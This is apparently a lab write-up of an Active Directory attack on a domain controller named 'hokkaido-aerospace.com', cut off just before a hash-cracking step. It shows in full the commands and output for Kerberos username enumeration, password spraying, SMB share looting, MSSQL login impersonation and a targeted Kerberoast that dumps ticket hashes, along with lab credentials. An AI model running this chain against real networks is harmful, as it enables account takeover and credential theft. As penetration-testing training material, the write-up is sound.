5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8530/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
8531/tcp open unknown syn-ack ttl 125
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
47001/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49684/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49691/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49712/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
58538/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 192.168.135.40:58538:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 58538
|_ssl-date: 2024-10-19T05:11:47+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
| SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQLhWUI307A4ROtwMgh+8WuDANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwODAyMDIxMzU0WhgPMjA1NDA4MDIwMjEzNTRaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJOM/LlJ
| n7WRALHhPH9JpPOUCprXzepna4LoyPFu7jf3ndos/OXkWEmhJXWbOmRgoBg+MYb9
| FcoA6cdcPQYVQMQ9sYIm9RnlwnpYHzdBCamVX9GEOcB7g05fJED+IDzZyIZSlvRb
| BJfUOJsHC47hkZuDSM8pucGG4aYwrLrqmH59xt4FfHnneSa7FIE0UTrtDQHuEiAa
| rmTSdS5VotclR99upSYGnySGgxeE4rojdz6RoCZO7MfVRKxuq2jzwyAw4KTrbDb5
| innLtClsPryZwnT/xwxY6JUmA2i9/0GKM9bphQXu4eWC23fhCh+Ej1lLeB1x6duS
| 0OcUD9ViEIaAIX0CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAHbiMlU++aiHToJuF
| ECtOjqW4vlEq9VKI57Q1CtsFfCxTsY4fSnS+0lylxOReAfU6GnXaIkAq1VSEml7r
| RBo6bYWxYwDWrmy4RoHBHzE2DKYfq8x7i09uDQ3E2ndWE83k2wbyJ6aXMld120D7
| 73S1hCFppHJwqBqjvOFr+HePxMG8XT4YXZvFjtgiL2cvPoAc4swU1VlMeFfPRrve
| 6D442eQMd+tVckMrS/3p9AavbUGwwyFUDgPS2pp3e4A/pQdPMN91gvoVaguWKY4J
| lAbWPCd5UKPsIz3QS/lXivFtCLBSkxsqlM6/dF1mIMfHMECyxL4esBifdGqYcnt5
| p9exOQ==
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info:
| 192.168.135.40:58538:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
I usually started out with port 80 but there’s nothing interesting. I also looked into other potential port but nothing seems to be useful. I then look into port 88 to get some potential username first.
Port 88
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
./kerbrute_linux_386 userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 192.168.135.40 -d hokkaido-aerospace.com
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/19/24 - Ronnie Flathers @ropnop
2024/10/19 13:17:25 > Using KDC(s):
2024/10/19 13:17:25 > 192.168.135.40:88
2024/10/19 13:17:25 > [+] VALID USERNAME: info@hokkaido-aerospace.com
2024/10/19 13:17:28 > [+] VALID USERNAME: administrator@hokkaido-aerospace.com
2024/10/19 13:17:30 > [+] VALID USERNAME: INFO@hokkaido-aerospace.com
2024/10/19 13:17:38 > [+] VALID USERNAME: Info@hokkaido-aerospace.com
2024/10/19 13:17:48 > [+] VALID USERNAME: discovery@hokkaido-aerospace.com
2024/10/19 13:17:48 > [+] VALID USERNAME: Administrator@hokkaido-aerospace.com
2024/10/19 13:21:45 > [+] VALID USERNAME: maintenance@hokkaido-aerospace.com
I managed to get some potential username by using kerbrute
. Now that I have username, I tried to just use common password such as rockyou.txt
and also reusing username as password.
1
2
3
netexec ldap 192.168.135.40 -u user -p user
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
LDAP 192.168.135.40 389 DC [+] hokkaido-aerospace.com\info:info
Since I have access to ldap, I tried to get more information by utilizing bloodhound-python
first.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
bloodhound-python -d 'hokkaido-aerospace.com' -u 'info' -p 'info' -ns 192.168.135.40 -c All --zip
INFO: Found AD domain: hokkaido-aerospace.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 34 users
INFO: Found 62 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: dc.hokkaido-aerospace.com
INFO: Done in 00M 03S
INFO: Compressing output into 20241019134205_bloodhound.zip
After that, time to import to bloodhound and have a quick look.
After having a quick look, it seems like my current user is not that useful. Time to continue other port first.
Port 139/445
Since Ldap works, I assume smb would also work.
1
2
3
netexec smb 192.168.135.40 -u user -p user
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.135.40 445 DC [+] hokkaido-aerospace.com\info:info
Since the cred works, I have a look at what share drive I have.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
smbmap -H 192.168.135.40 -u info -p info
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
It seems like I have read access to some drive. After going through, I noticed some interesting information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
smbmap -H 192.168.135.40 -u info -p info -r homes
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
./homes
dr--r--r-- 0 Sat Oct 19 14:08:12 2024 .
dr--r--r-- 0 Sat Oct 19 13:01:32 2024 ..
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Angela.Davies
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Annette.Buckley
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Anthony.Anderson
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Catherine.Knight
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Charlene.Wallace
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Cheryl.Singh
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Deborah.Francis
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Declan.Woodward
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Elliott.Jones
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Gordon.Brown
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Grace.Lees
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Hannah.O'Neill
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Irene.Dean
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Julian.Davies
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Lynne.Tyler
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Molly.Edwards
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Rachel.Jones
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Sian.Gordon
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Tracy.Wood
dr--r--r-- 0 Sat Nov 25 22:57:09 2023 Victor.Kelly
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
smbmap -H 192.168.135.40 -u info -p info -r NETLOGON --depth 2
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.135.40:445 Name: hokkaido-aerospace.com Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
homes READ, WRITE user homes
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
./NETLOGON
dr--r--r-- 0 Sat Nov 25 21:40:08 2023 .
dr--r--r-- 0 Sat Nov 25 21:17:33 2023 ..
dr--r--r-- 0 Wed Dec 6 23:44:26 2023 temp
./NETLOGON//temp
dr--r--r-- 0 Wed Dec 6 23:44:26 2023 .
dr--r--r-- 0 Sat Nov 25 21:40:08 2023 ..
fr--r--r-- 27 Wed Dec 6 23:44:26 2023 password_reset.txt
SYSVOL READ ONLY Logon server share
UpdateServicesPackages READ ONLY A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent READ ONLY A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
[*] Closed 1 connections
It seems like there’s alot of potential username and a potential password file. I then save the username and download the password_reset.txt
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
smbmap -H 192.168.135.40 -u info -p info --download 'NETLOGON/temp/password_reset.txt'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: NETLOGON\temp\password_reset.txt (27 bytes)
[+] File output to: /root/pg/Hokkaido/192.168.135.40-NETLOGON_temp_password_reset.txt
[*] Closed 1 connections
cat 192.168.135.40-NETLOGON_temp_password_reset.txt
Initial Password: Start123!
Now that I have a new password and bunch of username, time to spray again.
1
2
3
4
5
6
7
netexec ldap 192.168.135.40 -u user -p 'Start123!'
SMB 192.168.135.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\info:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\administrator:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\INFO:Start123!
LDAP 192.168.135.40 389 DC [-] hokkaido-aerospace.com\Info:Start123!
LDAP 192.168.135.40 389 DC [+] hokkaido-aerospace.com\discovery:Start123!
Another new user. Time to look into bloodhound again to see what this user could do. I could not get any useful information there so I decided to just spray other services as well.
1
2
3
netexec mssql 192.168.135.40 -u discovery -p 'Start123!'
MSSQL 192.168.135.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
MSSQL 192.168.135.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
Time to have a look at mssql port.
Port 1433
1
2
3
4
5
6
7
8
9
10
11
12
13
impacket-mssqlclient hokkaido-aerospace.com/discovery:'Start123!'@192.168.135.40 -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (HAERO\discovery guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
The first thing I tried when accessed the services is trying to enable command shell so that I could execute command but it seems like I don’t have the permission. I then look into things that I have such as database.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SQL (HAERO\discovery guest@master)> enum_db
name is_trustworthy_on
------- -----------------
master 0
tempdb 0
model 0
msdb 1
hrappdb 0
SQL (HAERO\discovery guest@master)> use hrappdb
ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.
It seems like there’s a database hrappdb
that looks interesting but I don’t have the access to the database. I then check if I could impersonate enother user in the database.
1
2
3
4
SQL (HAERO\discovery guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- -------------- --------------
b'LOGIN' b'' IMPERSONATE GRANT HAERO\services hrappdb-reader
It seems like I could impersonate user hrappdb-reader
. I then try to impersonate the user and hope to gain access to hrappdb
database.
1
2
3
4
5
6
7
8
9
10
11
12
13
SQL (HAERO\discovery guest@master)> execute as login = 'hrappdb-reader'
SQL (hrappdb-reader guest@master)> use hrappdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';
TABLE_NAME
----------
sysauth
SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from sysauth;
id name password
-- ---------------- ----------------
0 b'hrapp-service' b'Untimed$Runny'
I managed to impersonate a new user and get a credential from the database. Time to check bloodhound again for potential information.
The user hrapp-service
hash GenericWrite
permission to hazel.green
which mean I could attempt targeted kerberoast attack according to bloodhound. I’ll be using targetKerberoast.py
to perform this technique.
1
2
3
4
5
6
7
8
9
10
11
python targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Hazel.Green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/Hazel.Green*$3bf76c903da0babcf1c26d7b783c9ca4$fbfa63b0023803273551aecf9b75e038d58839302f1bce5acb60967078c62520788431315797c2e6ee4769344376b093015b99eabc73879cc31aff1f2032949dde541733a11c9af6a3fdee4d92f226966d5411a07b5b2e2b81dc5a5ffe388988be93378b5de975d798cfc860d85e7ef8a7f6988174deff51363c073ced7de3a972c6d86506a31ee971df358eac07b8aa3b8e2f244e6c11c0118bd39b6051d8a6de48fa423e9cdaa1a161aa88078746c500525a5585062eef0060b5ce08e58a6d34c16709f20098ce5a64eb63a609eec2c745d363f7793866cbdbd0d0524902d6045bc09c0415978647b91d5df4084d173196e1a8c180e8e5ba766de8151083667d033de8ecd9436fe7f6cab30d7d92a28e017e0e630a38f8cf9eeef73315c45330fb3ae90163321dc50666d58de2240dd0325a7471b0a767f21ac2ccf97cdc0634c507fe2f93bfee045389cebe389a64630eea3026c1a844af440e5724524f4c8f175ec4dc317b313744cc62c6e716755c6eaf863a0dd53d2f075f52f38cb1827fec22587b7f62aa8c81a8bfbe7ba1b71cea3f5beaefc0815513f208bee68bb4d7f315dbcc7a4fa4e200a900f4d21484025d48f6a662e5d07f0ff3562f75176aaf0e83afb4e74003e1d0858c4b10a0409723de22868d5a71960dfe77f72dd3c1539a5e5315bf1c8669569ee01e51acf9deeb2dd3cf2b003c3b754eca764bb015cb2e6aaadfa9c05222b8fcd3fd398ffa44d3cbd51f2042d0b410ff0119b26efa7f152ca092b1ca30195afd00a1bb38681247c24142da4a27d3c55157db1153e44d181af6638636e8b1cd9929fedc31a8d01e6f1f2eb1b8ceffcbb20f5d12ced01f272eba910e71e3af77c2d9a204f1b84601ae9952731f5b8a47626e6d710c79caab3868f8525d8a7a56ca68507549cf287313a67345505c0c575069d6c40ae8181044cff9d2bb7b762379aced7941ace4cc8490c4f9fb1f81ee42b245b487505eea3c295f01ba3728ca481efba7911f7f3150d29214ea990396c119d5ab76d7a72f919c9afabd93a1928944e9f970bcbd690ddd3b1139d61de2636b2b03277038b7bd210d74c94e485e48f4f08aba46f487139eeed68bdebb920fb44715c9af75aa46c1d64bcd97ec82c3ea2416a66ece1da4855c4b6aaf97f8bccbf7042b28900d2e4da34d061320b97dc163c6991270dd843b27520baccb99aafe148c98443e34af3acd03a85290848ce946665bc4c2818d453adaedb5bd115587c1713db5f814a2d8594ddb900a694432a8eec955153d2f6d018c948993cca8038855e0e5d0ad0e741002640bb99c05e2ef218b4429d5b02f85d7a7f25ec3fcbc0643bc64be03f25d7ba6e49d7bba09d2a9147fae03ecc0345c41fd669f574f6bd914fecddf1e8329771c3bc5b9ffb5160a5c59815a16794476b8a81a5fe2df0f7f1cd1a7fcf4fb970584a96a64dca4b20bc868feedf676cdb5769a56210c057bef4a2299e61cc2109324b305a8c83f73b68f1d3e9006646e7480daf00ea9d969ad479a0da1e57ada5e7a23818eba4686532bdf2ad61386f02f427aa6d2184baa45a571aa8785755a1c5d9620f9bdeaafde6ac555fe8ebbd4340ebefeaad107d3664ab68ddef04aef0efbccd2cea83aa0
[VERBOSE] SPN removed successfully for (Hazel.Green)
[+] Printing hash for (discovery)
$krb5tgs$23$*discovery$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/discovery*$b1039309385c477097a249a92d9d05a8$033df905d49c5185623fd7592c2dd8108c17abae89f9c81c1084be288bbd0432f02506bbc1f5a1e195d606d52cc89330a75caeed9bd89fcc32c9658fc82c2f827002b32f97dda9c99579146fcd1d68958c9da71b58f2494d55d4568b569d003abbaa5c67a73cd7999881bf68bf54222b1ed562cfefaa179c17a2d9c3c01314509b3393ad567f6f87a18c6ddf104ee9a22b8b6f1424d989b3f329a950c169acc491db3f2f07628c8747cb047b83fb01ef2f7a88f957be17278410b6f504b8ec7f4901897b4b254e3cc0d37b6f40d19856cb417e3c54756aac6127fa37780838cc580aaa7f9bb21ed16293884b1b25490e525150f9c69ce33c0945316ccf1c02417e93fa30c54fca505f42dfe1912ab096fc74ee4604ed5690b9ae8e980d8c8dc0bbe94586b7ee542f71a9f6d10d5d2b73444d5e8808ccc07e66920422ce91cdf5a4b3d9bad5a7c27a7aab6e2c6083972ca7512679c66373b73b1865af9ccafd3c4211e0b3cbb592e576928c939428dd6e2f8a728365e620ec3ed8e35631caddbcf2a904d463ba2c72958cd27b07487b50e84e0c588e99af9d1038ac9b8116af0da04f5fb4c884804b66fa8acb94a14e1dfff794999da8363ab2234304ac5af0d7614d134681decc66a45dd241e5f352efb9c578160823e5af94ad23dc362f052a90bba39830d860d746854f383cef864f75a532601a840258a068a40475aa389c84676cd45bca8454e7ea789cf8f2e212dd7b3e88fe582f31eb2848706a3d24c479a2f756eb7eafacb3f8dd68951aa1f0eb47906bdd87930c3a9641a0997fc52932d221bfbda19fa363683baeb3dc5d6b08281952104529e87150a9f0dc0d661b20cd11a10bd76dc83a9a371c57324c25b0d3a916f98ae4aaa3ef4bf723d73c26519b98d5036f3d01c476ccf79662f34bfa1e8b9189c5af02655477efa476ac169afac55deb09d4b6c424148c03971bd38ca8dfc2f8a762dff58ddeec35b038a2a942f8008cfb0f2aacb83cf3a1e9c3384deee88a1c3a22984cd317c30c55274a374ea7e33316d92f919be814a52cbd63b63fa669701a4180c7334faa06a5c8e15abdb7d764e82c2d37dbd66ae7c731a6d7f7d6d6fb84544eff09e7742664412bc313387a7a9a56926245b9718ca65c0e1753b8755a9309d344bff7f3e167b0151567771fbaa82d7a1c40693e7492017e8135907cc9bbcd8a20263a91db26d00b852576ebf073201afe3f3cbc76468e574485a67c0c3e4f3a608ea09a993eb6f92361a7e61a083712c55428d615bc06e0375d2f03f230abdcab8c254676136d5731a0d5501d57039216a7308af27e55db5054d7ccf08f8f0e65e95b0eea45a3b53f0a9cf19e3b507d91e8514038d950ad9256e3298147bc23d50580b5fd6af5e4b2a57dc3bbc0df0778a5d5c38992466df35dd7a3d393195a64cacfe1fed305f3195d8d6547d9bb1058b2e99ca26877a69da190879739652571826fbdbd7a43db27336f68c736fd9b8184d58f07a56e69ec9740c785ed408dc6c97047675e972983808ff68fa91635c74d7c51288749664574e0460680c7db50c75e34e5fe0a8f3b7576adf9eb12810cdec4be0347e72b05ec63108144875ab0a435fe8be0fc7d7457ce62f0e7d800f86cae2e
[+] Printing hash for (maintenance)
$krb5tgs$23$*maintenance$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/maintenance*$d133bd7548be53a72fe5d106699f7b5e$b677e027ef6dbc61e6fe2953a6afe793876ab8ad742ee7d54f256198e568d11dfa7f1a02bc68fe8d88e38a294abddf3eeb776e31a5d70023f9d8220422abddae8bd0eea3216645cbbe05d0b84ff74d6bdf44285067a0a600306563f6990c530066ecf3e4bffc3264daed6bebfc46b8c19de8a5f67b706313813036e90617b7909fa4ce104cbe005710badc380ceb96aab511e395fe355927ee40d6ccd66b11701d17659fd1adac3face0fa65d4efdafca68b9a4d78460dfa376770a04c9d44d1db17cff570b6f7dba23658c9f0f6851f13612b42c0e2c9e3bce0eb2aaa8a678a303babb1fb8fcd9e8f777e065c8f1c4a912b92ee79222d09388c4621f2635844918a405c7583e80de9aa589ccabae121a5930b9f1b0b0f0bac4a02ef69d7380cea43a536c95d566353288af6de3a4410fba0c25c6f42f725f52ae03bd574e8bff0810a427f81e3c12804b84436b93763047f07a3591f694a6fd0f133a3b861a40e3a986670deb11d66fcc9eda54a68806827bd9116086f4fd1b04d9cd49416c277557e4726697e7c6d54f581bab99ab2bc8bc31c32ae61c9e99495f9d18fa60fa68a45d4f19af68e04c4922f7ad9061a8126b8382e212aa47933ce226400fc18212904357457e3b3eb2c33c448262ca24260d5256ccf3ab575fc2674315a10b2be38602ef98cb0559132ff6bc83836a71ccb6083b8a93a2f3d806492961b29b4fac85ab0ddfad494188aa2414445d34ff6aad21632e059cca51e4754b4cdc984cbe30ce99f4667efeb73e438d5bf0ac1d1e84f7552ceeff2d2671655f0ab61c598c9a013d5545f4038f6b310868fe5ffeadbe0a0fc0b6c47b379afbd4fc7a567f10ba91b7b7244733c5832b7238330c1a0ff21a77c0e802e35a5353dc2adae2d65699a668a6dc652a807ba906c5b1eb176c82b1df821e72a004c0886ffe1c9d8e9f7c41e7bc511bb892a25a53e168665bf6222d32001a90036ea93662247fed66a3a941ee6895058432f7f5238ec919454300d3fb3b534d8bea8eaaf14bd62cf897e828d9882a63953278b8b2b7ac81e300cb6ed3186598d7e257a1dd8b83b762dac1f8e7de69bd05649fc51163d5eed5b9cf303f58990bb71b2d95663d372a1638c3e65b401d0b303f1775d151ec02571d0644be4a231855f94484705ff7ab80d556130fb3bf1a34dd10a2f3c9e92dd77cc8285dd32860ed8e69a91c5601eaf278849c1181da44b809246a7691e555b21fea2037f27e77d798f8048ecffffda1c84c2ce772f63ace38bd686c3e091e4b2e2cc3dbf0a29d141f1beb1c6e66d3fa19e87e29122503e0579128f6df530cee17f48cf51ef47fbf455d1efded230f5039a3f8c9cd11411c80c65b642001db4b63b9b40a2c4527fce1f7c5e431a39e17d6d56260a4f08fdab991336c971c6d9b9d00555c7eb4dfeca7b926c609cf1e0ed820f94cf47472443f2c97b780a9416c7ee27330fe9944433fec618cbc8e4ac4f4002aaac04b2c0c6a963ae22121b81d230a6bd092b70b8e40deb4b1048217e135e40394fd61230247d9d6d98dc739d14859512722adffeb596526ed5f5704dad6aefeb5f53cc56c969757582ac76bd8a90287ed00f83ca11b1c8bcb4f76fa47cd2c3ebec1342d5e006a43b
I have 3 hashes after using the command that provided by bloodhound. I then try to crack the hash using john
.
1
2
3
4
5
6
7
8
9
